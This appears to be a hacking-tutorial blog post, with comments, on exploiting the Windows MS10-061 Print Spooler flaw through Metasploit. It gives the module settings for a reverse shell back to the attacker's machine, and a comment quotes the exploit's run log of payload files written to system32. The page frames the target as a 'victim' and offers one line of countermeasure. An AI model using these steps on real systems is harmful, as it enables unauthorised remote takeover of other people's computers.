• 8,385
  • 91
  • +479
  • 582
Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP3 (Windows 7, Windows server 2008, Windows Vista)

Attacker O.S : Backtrack 5 R1

Threat : Critical

Have you ever seen someone sharing their printer inside a network?? When you're working in an office maybe you will see this everyday, a printer connected to a computer and that computer act as a print server. But this vulnerability didn't discuss about print server, but the service behind printer sharing in Windows. In this tutorial we will try to hack windows via Windows printer sharing service.

This is the definition about this exploit according to metasploit website :

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.

Maybe you'll become impatient if I write too much about the intro :-P so…let's start the tutorial

Requirement :

1. Metasploit framework

Step by Step :

1. The first step you need to explore your network locations and find printer sharing devices there. Below was my picture when I found one active printer sharing in my network.

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

2. Yep we've got 1 victim there and now let's prepare our metasploit console by typing msfconsole command, and then use ms11_061 exploit and set up the payload.

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

3. To view the available switch, use show options command. The picture below was my switch configuration to perform the attack.

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Information :

set pname canon --> set up the printer name (see step 1)

set rhost 192.168.8.94 --> IP address that host the printer sharing

set lhost 192.168.8.92 --> attacker local address
(use ifconfig to view your IP)

set lport 443 --> connect back port from victim to our computer

4. Okay, until this step everything we've been set up so nice and ready to attack the victim. Let's run the exploit command to perform the attack and see we can pwned it or not.

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

5. Yep everything was running so pretty, and then for the last result after waiting for the session:

Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

We owned the machine :-P

Countermeasures :

1. Always update you operating system

Hope you enjoyed :-)

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • TeDDy

    pwned !
    nice work bro… but that one was easy. :P

    • http://www.vishnuvalentino.com v4L

      #TeDDy
      Thank you bro!…

  • arnet

    [*] Started reverse handler on 192.168.137.1:4444
    [*] Trying target Windows Universal…
    [*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.137.224[\spoolss] …
    [*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:192.168.137.224[\spoolss] …
    [*] Attempting to exploit MS10-061 via \\192.168.137.224\Canon …
    [*] Printer handle: 000000005585a4496b34624594c9484db0f97737
    [*] Job started: 0x2
    [*] Wrote 73802 bytes to %SystemRoot%\system32\t1z9K0FhmmS7R4.exe
    [*] Job started: 0x3
    [*] Wrote 2220 bytes to %SystemRoot%\system32\wbem\mof\W2LbteYl5jKxTG.mof
    [*] Everything should be set, waiting for a session…

    No session is created…help me